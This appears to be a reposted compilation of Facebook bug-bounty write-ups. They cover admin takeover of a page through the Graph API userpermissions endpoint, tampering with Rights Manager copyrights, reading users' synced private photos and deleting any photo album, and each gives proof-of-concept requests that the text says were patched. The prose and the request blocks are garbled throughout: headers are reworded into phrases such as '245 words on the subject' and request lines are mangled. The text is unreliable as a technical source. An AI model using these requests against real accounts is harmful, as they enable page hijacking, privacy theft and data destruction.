Hacking Facebook Pages

Hacking Facebook Pages
Content List

The Facebook business manager endpoint has a security vulnerability that allows a third-party application to hack into a Facebook account page with limited permissions, resulting in the victim losing admin access to the page for good after the attack.

Facebook's application interface does not allow third-party applications to add or modify page admin roles by default, and this is a security feature (page roles like a manager, editor, analyst, etc.). Third-party applications are permitted to perform all operations, such as posting statuses on your behalf, publishing photos, and so on, with the exception of adding or removing admin roles. This is because if an application is permitted to add or remove admin roles, it could add some user as an admin to the page and permanently remove the actual owner.

For business pages, however, there is an endpoint called user permissions that allows administrators to add or remove business page admin roles who are already in charge of running the Facebook business.

Hacking Facebook Pages


The following request would elevate the target user to the position of page administrator.

Specifically, I'd like to request:

HTTP/1.1 POST /page id>/user permissions GET /user permissions

Graph.facebook.com is the website's host.

245 words on the subject

role=MANAGER&user=<target user id>

&business=<associated business id>&access token=<application access token>

Response:-

true

After a few minutes of testing, I discovered that removing the business parameter from the request did not result in any errors and that we were able to add anyone as a new page admin and delete the actual page admin on the non-business page where the application had managed pages permission without encountering any issues.

That's all there is to it! No matter what application it is, if it has been granted the manage pages permission by the administrator, it has the ability to hack into all of your Facebook account pages in a matter of seconds.

The final proof of concept for Page Takeover is as follows:

-Request for information:-

HTTP/1.1 POST /page id>/userpermissions GET /userpermissions

Graph.facebook.com is the website's host.

245 words on the subject

role=MANAGER&user=<target user id>

&access token=<application access token>

the truth about removing the victim

Specifically, I'd like to request:

HTTP/1.1: Delete the /page id>/userpermissions resource.

Graph.facebook.com is the website's host.

245 words on the subject

user=<target user id>&access token=<application access token>

Response:-

true

That's all there is to it! The targeted page has been hacked!

This vulnerability was reported to the Facebook security team, and it has since been completely resolved. As a result of my participation in their bug bounty program, they awarded me $2500 USD. Despite the fact that they have implemented a fix for this vulnerability, you should be cautious about the permissions you grant to any applications.

This is what the Permissions dialog box would look like.

The Manage Pages Permissions dialog box is displayed.

If the manage pages function is requested, please keep in mind that this app will be able to manage the pages on your site (post statuses, publish photos, etc..).

Hacking Rights Manager is a free tool that allows you to freeboot your Facebook account.

It is a form of piracy that is most commonly associated with downloading someone else's copyrighted material and uploading it to any other internet platform, most commonly videos from YouTube to Facebook. Hacking Facebook brand page copyright data is relatively simple thanks to a security vulnerability in Facebook's newly introduced platform called [Copy] Rights Manager (which was created to prevent Freebooting).

Freebooting in Facebook's native video player is something that the company is actively attempting to prevent. Recently, in April, they introduced a tool called Rights Manager, which allows well-known brands to detect and claim their copyrighted videos that have been uploaded to the social media platform. This feature makes it simple to identify people who frequently upload videos that are infringing on others' intellectual property rights.

It is possible for pages/profiles that are constantly uploading copyrighted materials to be banned at some point.

When using the rights manager tool, brands can upload their video items (source videos in order to detect pirated videos) and the owners will receive notifications whenever one of their copyrighted videos is shared on social media. Occasionally, copyright owners can request that pirated videos be removed from YouTube, or they can request that a few specific brands be exempted from the policy.

So, what exactly is the hack?

The rights manager's application interface enables end-users to manipulate request data and gain control over other brand pages' copyright source data through the use of a web browser.

As a layperson would put it, because the rights manager's authentication mechanism is not validating requests properly, any Facebook user without consent permission can read, edit, and delete source video or manipulate the detected pirated video without being denied access.

Specifications and Specifications

The Rights Manager tool has been preapproved for a few official pages, and anyone can submit a request to have it approved for their page.

Preview of the Facebook CopyRights Manager Tool

Once your application has been approved, you can begin uploading your videos in order to detect pirated copies in the Facebook native video player area.

Rights Manager makes use of the Graph API, and its official documentation lists a number of endpoints that can be accessed by third-party apps. Default settings for the Rights Manager GUI include the use of a pre-approved app known as "2734654184080: Content Tab of a Page on www." The access token can be found in the source code of the application.

https://www.facebook.com/page username/publishing tools/?section=NEW MATCHES

Due to the fact that it is a Facebook-owned application, its access token allows us to read or manipulate data for any Brand page, as there are insufficient permission checks.

Demonstration of Concept:

MODIFICATIONS TO THE VICTIM'S COPYRIGHT https://graph.facebook.com/v2.6/

<copyright id copied from victim query>

?method=post&monitoring type=VIDEO AND AUDIO&access token=<attacker access token>

&whitelisted ids\s=<attacker ids to bypass copyright check>

&rule id=<any rule id if you wish optional field>

&ownership countries=

<can update countries as well but optional>

All of the above-mentioned fields that have been included in the parameters can be changed.

Examining the Victim's Video Copyrights: https://graph.facebook.com/v2.6/victimpage id>/video copyrights? access token=attacker access token

Taking Away the Copyrights of a Victim https://graph.facebook.com/v2.6/

<victim page copyright id>?method=delete&access token=<attacker access token>

Formalize a copyright rule on behalf of the victim's website.

https://graph.facebook.com/v2.6/<victim page id>/video copyright rules?access token=

<attacker access token>&name=testrule&condition groups=

[{action:”ALLOW”,conditions:[{type:”MONITORING TYPE”,operator:”IS”,value:”VIDEO ONLY”}]}]

Read the Copyright Rules for Victims at https://graph.facebook.com/v2.6/.

<victim page id>/video copyright rules?access token=

<attacker access token>

Removing an Infringing Copyright Rule from a victim's page can be done at https://graph.facebook.com/v2.6/?method=delete&access token=(attacker-access token)

Fix was acknowledged on Facebook, with a bounty of $4000 USD offered as compensation.

How I Exposed Your Private Photos on Facebook - Facebook Private Photos Hack

What would you do if your private mobile photos were leaked to the public?

Taking photos with our mobile phones is something that we all do on a regular basis, and there are bound to be some private photos among them. What happens if it is hacked?

Oh my goodness! Hackers gain access to private photos.

Specifically, this post is about a security vulnerability that I discovered on Facebook that allows any malicious Facebook application to hack into your mobile photos and videos (synced).

The Facebook mobile application has a feature called "Sync photos" that allows us to create a backup of our mobile photos (up to 2 GB) and store them on our computer. This feature allows the Facebook mobile application to upload all of the photos taken by your mobile device to your Facebook account, where they will remain private until you choose to make them public again.

Some mobile phones have the ability to automatically sync photos enabled by default. We can manage it through the app's settings. The majority of us are completely unaware of this feature. In order to prevent Facebook from saving your photos, go to the app settings and turn off the feature.

I was extremely interested in learning which endpoint was in charge of these photographs. After doing some research, I discovered that the "vault images" endpoint of the Facebook Graph API is responsible for handling the synced photos. I began my exploration by going through the endpoint. Reading the synced photos through this endpoint caused my eyes to become irritated, and it appeared to be vulnerable.

After only a few minutes of testing, I discovered that the "vault images" endpoint is vulnerable to attack. It's a resounding yes!

The Facebook mobile application sends a GET request to https://graph.facebook.com/me/vaultimages with a top-level access token in order to read the synced photos from the Facebook server. If the request contains a valid access token, the Facebook server will respond with the synced photos of the corresponding user.

Part of the vulnerability is that it only checks the owner of the access token, rather than checking the application that is making the request. As a result, any application that has the user photos permission can read the photos stored on your mobile device.

Users' public photos are read by a large number of Facebook applications that use the user photos permission to access the user's public photos.

In a matter of seconds, a malicious app that you are currently using can access all of your private photos. I understand that the majority of us will not be able to see the list of permissions while using any application.

Permissions for the Facebook Application

Please take the time to review the permissions before granting them.

Video Demonstration of the Concept:-

I reported this vulnerability to the Facebook Security Team, and as is customary, they responded extremely quickly to address the issue. In less than 30 minutes after receiving notification of the report, they implemented a fix. They are absolutely fantastic in this regard!

No other applications will be able to access your private photos anymore because they have simply whitelisted their official mobile applications in that endpoint.

This vulnerability has been completely patched, and vault images can no longer be accessed by any application other than those that have been whitelisted.

An "error" has occurred with the following message: "(#3) App must be on whitelist", "type": "OAuthException", and a "code" of 3 digits.

The first official acknowledgment from the Facebook Security Team has been received.

Vulnerability in Facebook's Private Photos & Videos Facebook's Security Team has acknowledged receipt of your message.

Delete any photo albums that you have created - How I Hacked Your Facebook Photos

What happens if your photos are accidentally deleted without your permission?

That is, without a doubt, extremely disgusting, isn't it? Yes. This post is in regards to a vulnerability that I discovered that allows a malicious user to delete any photo album on Facebook without being detected. Any photo album owned by a user, a page, or a group may be removed from the system.

The Graph API is the primary interface through which developers can read and write data about users. Graph API is currently being used by all Facebook applications. In general, in order to read or write user data, the Graph API requires an access token. More information on the Graph API can be found here.

According to Facebook's developer documentation, photo albums created using the album node in the Graph API cannot be deleted using this method.

I attempted to delete one of my photo albums by using the access token for graph explorer.

-Request for information:-

HTTP/1.1 Request for deletion of /518171421550249

Graph.facebook.com is the website's host.

245 words on the subject

access token=CAACEd…..MUD

The response is as follows:

{“error”:

the message "(#200) Application does not have the capability to make this API call." the type: "OAuthException," the code:200 the message "(#300) Application does not have the capability to make this API call."

Why? This is due to the fact that this application does not have the capability to delete a photo album. However, we must take note of the error message. Essentially, it informs us that another application does indeed have the capability to make this API call.

Due to the fact that it is a top-level access token with some additional permissions, I decided to test it on Facebook for a mobile access tokens. The Graph API is used by both the Facebook mobile apps and the Facebook website. So I used an album id and a Facebook for Android access token that I had and gave it a shot.

-Request for information:-

HTTP/1.1 Request for deletion of /518171421550249

Graph.facebook.com is the website's host.

245 words on the subject

access token=

<Facebook for Android Access Token>

Response:-

true

What should I do now that my album (518171421550249) has been deleted? The attacker took the victim's album id and attempted to delete it. I was extremely interested in seeing the outcome.

-Request for information:-

HTTP/1.1 Request for deletion of /518171421550249

Graph.facebook.com is the website's host.

245 words on the subject

access token=

<Facebook for Android Access Token>

Response:-

true

OMG, the album was accidentally deleted! What's the big deal? I was granted access to delete all of your Facebook photos (either those that are visible to the public or those that I could see).

This bug was reported to the Facebook security team as soon as it was discovered. They were far too quick in identifying the problem, and a fix was in place in less than 2 hours after receiving notification of the problem.

More information can be found at [Capture Android HTTP/HTTPS Traffic] about obtaining a Facebook access token for Android.

Final Demonstration of Concept:-

-Request for information:-

DELETE /Victim's photo album id> from the victim's photo album. HTTP/1.1

Graph.facebook.com is the website's host.

245 words on the subject

access token=

<Your(Attacker) Facebook for Android Access Token>

If you're not sure how to do it, watch this video [How I Hacked Your Public Facebook Photos] to learn how.